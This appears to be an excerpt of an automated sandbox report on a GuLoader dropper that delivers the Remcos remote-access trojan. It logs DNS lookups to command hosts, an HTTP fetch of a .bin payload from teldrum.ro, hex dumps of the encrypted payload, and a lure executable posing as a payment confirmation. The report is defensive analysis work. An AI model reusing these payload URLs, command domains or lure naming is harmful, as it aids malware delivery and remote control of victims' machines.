                                                          Jan 14, 2025 16:35:31.193465948 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.193521976 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.193530083 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.193572044 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.193634033 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.193686962 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.193876028 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.193927050 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.194165945 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.194215059 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.194407940 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.194451094 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.194693089 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.194744110 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.194948912 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.194996119 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.195236921 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.195290089 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.195468903 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.195518970 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.195621967 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.195669889 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.222136974 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.222234011 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.222369909 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.222430944 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.222640038 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.222791910 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.254769087 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.254863024 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.254925966 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.255171061 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.283838987 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.283935070 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.283961058 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.284034967 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.287950039 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.287976980 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.287991047 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.288053989 CET49977443192.168.2.5109.99.162.14
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 14, 2025 16:35:28.994465113 CET6090453192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:35:29.076786995 CET53609041.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:35:36.337263107 CET6107153192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:35:36.346045971 CET53610711.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:35:36.348856926 CET5251253192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:35:36.357809067 CET53525121.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:35:41.438180923 CET5740553192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:35:41.447666883 CET53574051.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:35:46.562529087 CET6304353192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:35:46.571069002 CET53630431.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:35:51.641431093 CET5424953192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:35:51.650302887 CET53542491.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:35:56.718673944 CET6476253192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:35:56.727998018 CET53647621.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:36:01.797347069 CET4928853192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:36:01.807074070 CET53492881.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:36:06.875241041 CET5774753192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:36:06.957660913 CET53577471.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:36:12.751087904 CET5581053192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:36:12.759980917 CET53558101.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:36:17.468861103 CET5388553192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:36:17.478437901 CET53538851.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:36:22.452796936 CET5515253192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:36:22.462223053 CET53551521.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:36:27.077752113 CET6264353192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:36:27.086556911 CET53626431.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:36:31.984945059 CET5364953192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:36:31.994143009 CET53536491.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:36:36.970072031 CET5372653192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:36:36.983019114 CET53537261.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:36:41.935609102 CET6390753192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:36:41.945909023 CET53639071.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:36:46.935774088 CET6243253192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:36:46.944694042 CET53624321.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:36:51.936969995 CET5354453192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:36:51.946235895 CET53535441.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:36:56.941637039 CET5634053192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:36:56.950118065 CET53563401.1.1.1192.168.2.5
                                                          Jan 14, 2025 16:37:01.939055920 CET5129853192.168.2.51.1.1.1
                                                          Jan 14, 2025 16:37:01.948617935 CET53512981.1.1.1192.168.2.5
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 14, 2025 16:35:28.994465113 CET192.168.2.51.1.1.10x9132Standard query (0)teldrum.roA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:35:36.337263107 CET192.168.2.51.1.1.10x94b8Standard query (0)linktreewealth.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:35:36.348856926 CET192.168.2.51.1.1.10x6f96Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:35:41.438180923 CET192.168.2.51.1.1.10xf81eStandard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:35:46.562529087 CET192.168.2.51.1.1.10x7166Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:35:51.641431093 CET192.168.2.51.1.1.10x57a6Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:35:56.718673944 CET192.168.2.51.1.1.10xd77eStandard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:36:01.797347069 CET192.168.2.51.1.1.10xca9eStandard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:36:06.875241041 CET192.168.2.51.1.1.10x6225Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:36:12.751087904 CET192.168.2.51.1.1.10x79daStandard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:36:17.468861103 CET192.168.2.51.1.1.10xe1d7Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:36:22.452796936 CET192.168.2.51.1.1.10xd52Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:36:27.077752113 CET192.168.2.51.1.1.10x2997Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:36:31.984945059 CET192.168.2.51.1.1.10x77bbStandard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:36:36.970072031 CET192.168.2.51.1.1.10x7a1eStandard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:36:41.935609102 CET192.168.2.51.1.1.10x4449Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:36:46.935774088 CET192.168.2.51.1.1.10x2a78Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:36:51.936969995 CET192.168.2.51.1.1.10x4874Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:36:56.941637039 CET192.168.2.51.1.1.10x9c57Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:37:01.939055920 CET192.168.2.51.1.1.10x8574Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 14, 2025 16:35:29.076786995 CET1.1.1.1192.168.2.50x9132No error (0)teldrum.ro109.99.162.14A (IP address)IN (0x0001)false
                                                          Jan 14, 2025 16:35:36.346045971 CET1.1.1.1192.168.2.50x94b8No error (0)linktreewealth.zapto.org0.0.0.0A (IP address)IN (0x0001)false
                                                          • teldrum.ro
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.549977109.99.162.144435888C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-14 15:35:30 UTC173OUTGET /NJrdZqNcCtz102.bin HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: teldrum.ro
                                                          Cache-Control: no-cache
                                                          2025-01-14 15:35:30 UTC223INHTTP/1.1 200 OK
                                                          Date: Tue, 14 Jan 2025 15:35:30 GMT
                                                          Server: Apache
                                                          Last-Modified: Mon, 13 Jan 2025 20:36:39 GMT
                                                          Accept-Ranges: bytes
                                                          Content-Length: 493632
                                                          Connection: close
                                                          Content-Type: application/octet-stream
                                                          2025-01-14 15:35:30 UTC7969INData Raw: 7c cd 41 88 f3 aa b9 07 43 9f e2 63 1a 47 c0 99 31 f6 fb dd 98 80 55 65 a7 3c 37 0d 1d c9 47 fe 3b 7b 83 83 8b 95 f6 6d 84 04 cf 6b 56 6c 14 ef e6 62 6a 1b 24 de 29 fd 65 9d da 35 73 99 e0 3b e3 64 d9 d6 0b 86 83 14 68 d8 e0 b2 71 08 bb eb 3f b2 62 d1 c7 75 5f 29 f3 08 48 8e 63 dd b2 49 43 5d 51 bf b9 8a 67 bc bc 96 79 ae f3 18 ed fb c1 77 64 3d 94 2f ed 87 5d 08 71 1e ac 12 a9 4f 7e f6 2b bc 12 74 fb 4f d2 b0 1b 55 d7 e6 5a 1b ee ab 6e 5a bf 78 48 59 e7 8c b6 10 26 c5 e7 f3 13 33 03 d8 c0 69 ac 98 f1 0c 97 0f 65 30 a8 48 cf 5a f1 85 13 86 2b 0e 4c 0b 2a f8 12 3d cd 6d d1 d5 8e 28 37 d4 0c 7a 57 8e 4f 0f 20 d0 03 36 e7 ef 39 b3 65 fb 8e eb 51 8b 00 6c e4 24 1e 3b e1 f0 e7 99 2f 1f 74 43 d5 8d 49 43 6a 86 fa 0d 53 43 da 6a 0d 59 35 99 86 b3 4c 7d 52 02 d1
                                                          Data Ascii: |ACcG1Ue<7G;{mkVlbj$)e5s;dhq?bu_)HcIC]Qgywd=/]qO~+tOUZnZxHY&3ie0HZ+L*=m(7zWO 69eQl$;/tCICjSCjY5L}R
                                                          2025-01-14 15:35:30 UTC8000INData Raw: 14 7f ba 45 09 92 32 0f ea 33 6d d8 1a 88 94 cd 80 d9 de 78 1c 70 47 04 b3 85 ac 5c c4 03 ff 34 19 85 30 5a 54 a9 fc 6f f4 f5 4e 6c ab c8 ed 80 c3 51 93 da 8f 94 b5 96 ef 0d 3c 87 f0 60 c8 d0 72 ed 77 b1 ba 93 a2 bd a9 e7 c4 16 88 34 03 a0 68 16 25 bd 91 6a 01 6b ce d5 68 fa 35 f0 34 47 02 c0 86 37 e3 db 86 a7 f6 1b ea 4c 22 e1 9c ec dc 2f 0b 5c db fe 86 9c a2 3f 12 ec 92 13 7c 9d 90 4a 66 cd 42 d6 99 ca 08 a1 bd 46 6d 96 6e 7b 1d 6e 6f 92 22 af 5d 14 fc 39 99 cd 0d 7a a1 3e db 3d 2d e6 9d a0 aa 53 e8 7f 27 06 79 35 41 35 6d b3 49 68 8c 71 17 2f 03 99 00 3a c3 94 18 70 b8 f2 d5 33 13 bd 41 77 71 f9 37 31 ac 06 9c 5b 65 1c 03 7b fd 5d aa 1b db 42 96 69 e1 81 f8 e2 75 ec 13 a3 cb 8a 04 1a 10 d8 55 03 e9 f8 eb 66 56 7b f5 da cd 49 08 03 4c d6 ff cc c6 31 ca
                                                          Data Ascii: E23mxpG\40ZToNlQ<`rw4h%jkh54G7L"/\?|JfBFmn{no"]9z>=-S'y5A5mIhq/:p3Awq71[e{]BiuUfV{IL1
                                                          2025-01-14 15:35:30 UTC8000INData Raw: 1d 99 73 43 23 e8 b2 91 f3 06 0d a9 1d 75 98 f2 f3 8c 70 3a 7b 6b ef b1 8a e6 f5 13 19 7c b8 59 2d 4e 0c 0d d7 06 be 96 e0 6c 06 51 10 83 80 75 2c a1 13 99 ef 74 59 fb 19 54 8c d2 c1 15 c5 93 b3 b2 85 88 d2 fc bf 72 e5 bb 88 20 3a e4 b7 d6 00 91 c5 d9 7d 6f 91 1a 7f dd 13 84 10 2a 40 be 17 88 53 a7 f7 a2 b6 0e 28 cd c9 e7 d6 df 0c 29 2d 01 49 e3 c1 eb 6d 4c 9d 70 41 c5 64 eb b1 45 23 fc 63 49 c9 84 44 9a 92 d0 0d 51 ed 19 11 e6 c2 80 89 4d f9 bb 50 c4 19 66 92 aa e8 e2 87 2b 1a 4b f7 92 6d 70 f3 5d 91 89 33 22 10 24 55 c3 70 f3 9a c5 b7 fd c1 a9 49 6b f8 d0 db bd d4 36 45 f6 5f db 79 8d ca aa 9c a4 27 9e 85 97 63 f9 8b 23 7a 00 8d fe 2d 22 33 e8 26 d1 9f 4b ec f4 ce 5b c8 a3 d1 64 3e 65 4e f7 7a 30 22 f8 20 fd e6 7e 33 85 54 c9 df 40 16 5e 1c 2a ec 15 64
                                                          Data Ascii: sC#up:{k|Y-NlQu,tYTr :}o*@S()-ImLpAdE#cIDQMPf+Kmp]3"$UpIk6E_y'c#z-"3&K[d>eNz0" ~3T@^*d
                                                          2025-01-14 15:35:30 UTC8000INData Raw: e3 20 b1 06 5b 94 71 65 e9 ba 28 b3 50 80 36 e6 26 4b b4 36 a0 ab 64 ff 63 32 8e d4 61 bc b7 dd 4f 9d 09 da 48 ea 83 1b 49 74 33 ad 32 6b 05 69 b1 61 8c 07 ba 74 57 ff 19 5d 5b f0 bc 27 06 89 42 d9 e2 88 b0 eb 05 36 57 d5 0e fe 56 b7 d3 86 2c ef 87 bc 5a 1b ac be 8b 44 1f ae 0d 28 7a fe de 66 1c 85 65 92 9b 86 a0 9c f9 7d 2b 42 b0 d8 f1 d8 30 bb d6 a8 98 05 5e 39 f4 e0 e5 25 7f d8 e4 c4 82 3a b5 64 81 35 78 85 d6 c6 d1 0b 74 4c 0b 26 6e 51 03 2a f0 f7 2b 8d 80 7f 0b 24 ff 65 7c 37 d9 7a c1 b0 4b 1c 69 4d 0f 92 3c c5 c7 71 f9 fe fa d5 5d b2 65 33 7c 50 74 61 78 51 6f db f3 5b 2d 1b 2e e5 13 67 71 c7 72 80 f6 c4 36 aa 40 dd d2 35 80 a9 ec fd dd e8 94 93 c3 32 bf 77 c3 e6 af df d7 e0 74 6f ef 9c d1 1c c7 8d 02 3b 6b 28 22 41 19 25 cb 6b aa e4 28 4e 27 64 a1
                                                          Data Ascii: [qe(P6&K6dc2aOHIt32kiatW]['B6WV,ZD(zfe}+B0^9%:d5xtL&nQ*+$e|7zKiM<q]e3|PtaxQo[-.gqr6@52wto;k("A%k(N'd
                                                          2025-01-14 15:35:30 UTC8000INData Raw: 7f 8d df 74 cd 00 10 39 15 3c 84 c7 84 9c 29 2b 11 22 45 b2 31 27 5f 50 be 5b 34 ef 2b dc be 71 9a e5 60 bf b3 2c 9b 42 9f 6c 58 03 a8 89 65 22 b0 b9 a3 f9 29 f7 93 6c bb 4d 57 b2 09 d6 9e 99 aa e4 ba e5 30 55 99 4e d8 84 28 7f d0 6d 53 c5 b5 18 e7 c7 67 fa 38 fb dd 6d 03 6d 18 ba fe 2b 42 14 24 60 9e 1e ed a2 c6 82 2d 21 22 0b e9 65 b3 30 55 0b 23 72 ed 23 ba f7 be c1 7c 4b 91 dd 2f 5c ec 66 cc 00 ee c2 22 48 70 5f e1 0b 7f 9b 1d f9 ba 1b a4 a2 f6 cc 26 9d 4e 04 fd 30 91 bc bc 20 d6 f7 e8 69 b1 a5 a3 2d d5 62 0c 7b d7 74 a9 b6 36 35 37 6f 15 7d e0 9e 3c 09 bd 6a 5c 16 15 1f e4 25 ee 4e 4c 39 62 06 3d 40 ac 9e 66 9a 75 bf b9 a4 9c a9 19 f1 9d 30 b8 69 a7 79 ae 14 f8 72 1b 49 a7 94 0e 3d a1 78 f6 75 ec 65 ae 79 4d 19 f3 6c c0 f2 b7 a8 2d 93 b4 c6 b8 f8 09
                                                          Data Ascii: t9<)+"E1'_P[4+q`,BlXe")lMW0UN(mSg8mm+B$`-!"e0U#r#|K/\f"Hp_&N0 i-b{t657o}<j\%NL9b=@fu0iyrI=xueyMl-
                                                          2025-01-14 15:35:30 UTC8000INData Raw: 56 98 2e 6e 4e b8 92 f3 84 a4 48 f2 82 26 98 03 e0 19 59 53 59 0e 60 85 86 7f b2 d6 f2 3b 40 28 65 7a b5 15 bf 06 d9 09 a2 8b 2d 09 68 ea cb 01 ed 5a 40 f2 4b 75 b2 da e7 a4 ec a3 35 46 65 ba df d9 75 0e 75 9f ae b3 04 3e e0 3c f5 eb 93 5b 0c aa 05 3b ec 03 ac c5 9d 2e 44 99 47 a2 7f 60 1c ea 25 dd 5a 55 34 a2 ae 57 fb 8a 66 bc 3f 52 49 68 b5 51 ed 7b bf 3d 64 48 84 ac d3 87 29 03 8e 28 5b 06 39 cc 35 e9 12 94 12 70 f3 69 f1 3a da 46 44 0e cd 26 0c 34 cd c6 8d 41 78 a6 c3 11 1d 8a 17 54 9c 40 e5 56 61 30 a5 13 63 ee bd 23 f9 47 a5 14 bd 68 f2 b8 d8 20 d5 b6 2e 04 68 52 a1 28 9f 70 15 85 09 7c c6 73 d6 cc 58 c0 e7 2e f5 8d 67 67 57 8c 33 d3 47 31 31 4c da 51 9d b7 64 ee 08 93 4a 81 e5 cc e7 14 76 a8 20 b0 21 d9 14 b4 d3 9e cb 38 74 a8 c4 c4 b8 a6 a1 92 e7
                                                          Data Ascii: V.nNH&YSY`;@(ez-hZ@Ku5Feuu><[;.DG`%ZU4Wf?RIhQ{=dH)([95pi:FD&4AxT@Va0c#Gh .hR(p|sX.ggW3G11LQdJv !8t
                                                          2025-01-14 15:35:30 UTC8000INData Raw: c5 05 3d 3b 77 e5 ab 9e 85 41 f4 35 46 ad 80 5c 27 0e c9 07 23 34 d6 b7 63 95 67 b7 b1 91 3f ef 7f ff cb 91 cc e4 9f dc 99 d7 c1 38 2f 5d 2a bc d0 a6 36 8c c2 53 d6 e4 fd 32 28 c6 b5 16 a9 a9 af af 84 b6 2b 70 3f 39 4b 99 c8 1a 72 f2 a7 7d c0 2e 7a 25 3a 7f 15 24 29 b5 7a cc 75 93 8b 16 07 bd 44 23 f9 55 ef 22 11 ca 38 32 a2 2a b7 9b 31 60 5d 3d c2 a1 e5 1d 1a 72 e6 8f 6b b6 17 e3 0c 31 da c2 ce e6 29 31 2f f6 39 40 be 92 f9 5d d6 27 a0 a4 47 45 ee b2 a4 b4 3c da 8e 6b 66 82 9e a1 4e f9 21 0a a5 83 01 9a ae 53 aa 21 88 99 c7 ad 98 ac 1a a8 3f cb 04 64 c9 ea 4a 2e 85 34 36 31 8e a8 c9 8d 17 dc ec 67 fd c5 03 e0 7b 1c dd 69 77 26 2c 62 16 be 68 03 32 b8 17 a7 14 ff 07 74 04 77 63 a0 30 ab 42 6f 33 6a 33 44 c8 b1 d6 c7 3c 84 a8 4f 83 03 ca 4d 57 24 58 92 6f
                                                          Data Ascii: =;wA5F\'#4cg?8/]*6S2(+p?9Kr}.z%:$)zuD#U"82*1`]=rk1)1/9@]'GE<kfN!S!?dJ.461g{iw&,bh2twc0Bo3j3D<OMW$Xo
                                                          2025-01-14 15:35:30 UTC8000INData Raw: e6 b7 0d 40 8b 1e d8 64 6c d9 a2 d6 72 bd 50 85 29 57 23 a8 f7 4d 56 51 67 ff 06 88 a0 83 5f 65 f0 f8 fa 19 6a fb f3 9b 97 b5 30 da e0 34 bc 86 43 62 50 0d 98 a4 49 5b e4 ac 8d 19 a9 79 5b d7 09 ec f8 3c 05 93 f3 33 1b 7f f3 4d 11 6d 44 c1 12 f1 00 a2 90 41 4d 0c 00 49 0b d7 d2 54 b6 d8 7e 71 83 65 e9 42 89 b6 8c 9c 5d 40 66 6c 12 8c 8d 8e 16 05 fb 7d 5e 9f 0b 78 32 92 17 d2 f5 44 0f b2 71 1f 1d 71 e1 85 2c 23 4e 49 f3 84 c6 28 da 50 62 49 97 8e 70 74 fd d8 09 df 66 6c 07 4a b4 80 fb af 92 85 9a 18 f7 df b0 81 fc f9 6a 4f 30 57 43 36 a6 ab 93 39 15 7a 89 87 76 e8 aa d4 76 0e 3b 96 3c c0 0b d9 14 94 a3 3b e0 e4 57 08 08 87 9a 35 bb ef 80 5c f5 53 6c d5 8b ed 80 cb 58 38 c2 4e 69 40 69 7a 80 8d 93 d5 a6 a9 c8 ef 33 34 b5 1a 3f 37 41 ad e6 1c bd f0 1f 79 73
                                                          Data Ascii: @dlrP)W#MVQg_ej04CbPI[y[<3MmDAMIT~qeB]@fl}^x2Dqq,#NI(PbIptflJjO0WC69zvv;<;W5\SlX8Ni@iz34?7Ays
                                                          2025-01-14 15:35:30 UTC8000INData Raw: f1 54 97 8d 24 06 d5 1c 60 45 f2 66 ee 49 f5 64 db 33 93 03 7c 25 b1 59 98 b4 3a 26 56 a6 3f 9a 3a f3 1e aa 4f 76 dc 87 e4 c3 ad a4 ac 05 aa 86 e2 cc a1 f0 20 3b a0 98 c5 02 25 21 8b ef 0b 50 d7 91 c9 a3 83 22 a9 02 f8 d5 97 17 85 0e 0b 0d 5b b9 d2 3c 9c c3 14 19 72 39 c9 6c 32 67 99 d7 91 5b f7 19 31 65 53 93 68 02 d2 b6 94 3a b2 be c1 9e 1a 72 0b d8 29 4d 2e 6a 6c 54 cf ac ba 5d 65 d6 fc 9d 9d 74 4a e4 c7 7f 57 29 f4 1f 13 1d 21 7c c0 f2 0b d0 0c 50 74 f1 73 e3 68 3b fa bf 33 bc 89 58 6f 66 fc 64 d7 f7 93 05 2e e3 99 8e 4a 3e 67 ac c4 b0 0b 40 dd a0 0d 80 91 8f 8a 2d 76 a3 e1 70 4f f7 60 c9 da 5c ab 46 56 c5 19 4b e8 bf 17 15 02 ca 24 b7 0b f3 ca 82 bf 7c 5d 51 1b ec 97 41 93 23 6d 3e ad 24 c7 89 6c 29 6f 14 88 4f ab 52 43 39 43 18 5f 0a 65 3a 54 9b 01
                                                          Data Ascii: T$`EfId3|%Y:&V?:Ov ;%!P"[<r9l2g[1eSh:r)M.jlT]etJW)!|Ptsh;3Xofd.J>g@-vpO`\FVK$|]QA#m>$l)oORC9C_e:T
                                                          2025-01-14 15:35:30 UTC8000INData Raw: bf e7 84 d7 32 13 db 41 22 ad 47 26 44 8c 21 ed 4a 2c 45 f5 71 bd 43 2d 7b 48 ee 56 66 a4 d5 90 28 1c 67 4f d9 97 f5 42 bc 53 91 8c c2 2f 4b a2 4e 56 7e fa ed 5a 96 e2 ae bc 7d f0 05 da 70 56 16 24 62 97 53 fe 59 81 59 89 28 52 bb 45 d7 f1 e1 e1 e3 86 37 c1 e5 ba 67 dc f5 f3 8f 43 64 ba 53 c3 82 7f 3c 48 a9 3c 8e c6 cf 91 ec 56 cc 2b df 1d 7b cf f4 5d ed 69 8a 92 90 17 0b 0b 32 2a 27 b1 d8 6d 12 5a d9 15 89 7f 83 d9 45 5a 5b 13 f6 dc 7a dc 68 3f 51 40 b5 42 4e 8c 5e 55 74 a6 75 99 ac 9f 86 f8 e8 01 e2 5b a1 94 97 df 3f 01 8a 32 53 5f ad 32 3d 88 de 65 c5 ea ff 6b 4b e2 a4 dc 2f f9 f0 6b 23 a3 a3 b7 58 65 98 8e 2a 09 b6 89 cf 20 6b 2a 28 67 ca be 5d 35 c4 71 cc 55 15 72 f3 ea 11 e1 c0 ef 91 a8 46 11 b0 17 b8 84 9c 5b 7f 96 50 8e 2e 4a 74 a1 81 98 67 be 56
                                                          Data Ascii: 2A"G&D!J,EqC-{HVf(gOBS/KNV~Z}pV$bSYY(RE7gCdS<H<V+{]i2*'mZEZ[zh?Q@BN^Utu[?2S_2=ekK/k#Xe* k*(g]5qUrF[P.JtgV


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:10:32:57
                                                          Start date:14/01/2025
                                                          Path:C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"
                                                          Imagebase:0x400000
                                                          File size:550'217 bytes
                                                          MD5 hash:25EEC63EDF7C0EB8628A89712B5CB363
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3536097614.0000000006D99000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:10:35:15
                                                          Start date:14/01/2025
                                                          Path:C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"
                                                          Imagebase:0x400000
                                                          File size:550'217 bytes
                                                          MD5 hash:25EEC63EDF7C0EB8628A89712B5CB363
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4630508505.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:false

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:15.9%
                                                            Dynamic/Decrypted Code Coverage:13.4%
                                                            Signature Coverage:15.9%
                                                            Total number of Nodes:1608
                                                            Total number of Limit Nodes:35
